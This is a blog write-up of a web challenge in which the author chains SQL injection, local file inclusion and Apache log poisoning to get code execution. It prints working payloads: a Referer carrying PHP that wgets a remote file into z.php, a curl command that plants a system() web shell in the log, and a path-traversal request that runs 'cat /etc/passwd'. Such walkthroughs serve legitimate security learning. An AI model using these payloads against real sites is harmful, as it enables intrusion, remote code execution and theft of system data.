Spawning a Shell by LFI Poisoning Log Files

Spawning a Shell by LFI Poisoning Log Files

Spawning a Shell by LFI Poisoning Log Files

Welcome Padawan!
A while ago, a friend sent me a link to a challenge, I found one of the pages vulnerable to SQL Injection, I injected it, extracted the Admin’s Credentials and as soon as I logged in the “Admin Panel”, I found a page vulnerable to LFI.
So .. I tried /proc/self/environ, finding a phpinfo() page, data://, php://input and things like that but they weren’t working/there. 🙁 ..

The only thing I didn’t try was LFI Log File Poisoning but It was time to unchain the beast ..
I included the “Apache HTTP Configuration file” and looked for the error/access log. Interestingly, instead of finding a .log file, I found a piped bash script ..

Spawning a Shell by LFI Poisoning Log Files

Me likey 🙂 .. Then, of course, I included the bash script. — This was it’s contents ..

#!/bin/bash

DATE=`date +%Y-%m-%d`

while : ; do
 read line
 [ -z "$line" ] && exit

 DOMAIN=""
 if [[ "$line" =~ \[host:([^\]]+) ]]; then
 DOMAIN=${BASH_REMATCH[1]}
 fi
 
 if [ -n "$DOMAIN" ]; then
 echo "${line//\[host:${DOMAIN}\] /}" >> "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
 chown apache:apache /var/www/html/$DOMAIN/logs/error_${DATE}.log
 else
 echo "${line}" >> /var/www/html/error_${DATE}.log
 chown apache:apache /var/www/html/error_${DATE}.log
 fi
done

What does this do? It creates a .log file in “/var/www/html/domain.tld/logs/” with the name “error_YYYY-MM-DD” & According to the Apache Config, It sent URL, Referer and time to this bash script which then saved it to the file .. So, I just had to visit a non-existent page *to get a 404* with my referer set to “<?php system(‘wget http://x.com/y.txt -O z.php’); ?>” or any of it’s equivalents .. and then include the .log file to execute the code 😉

curl -e “<?php system($_POST[‘x’]) ?>” http://domain.tld/blablabla.ext

Spawning a Shell by LFI Poisoning Log Files

curl –data “x=cat /etc/passwd” http://domain.tld/admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log

Spawning a Shell by LFI Poisoning Log Files

I guess we’re done here 😀

ps: after solving the challenge I found out the “official solution” was nothing like this, it was a simple imagecreatefromXYZ() bypass. 😛
You had to upload an image-encoded shell to sucessfully bypass that function + other image re-sizing functions .. there are various great articles written on that topic here are some of them ..

4 COMMENTS

Leave a Reply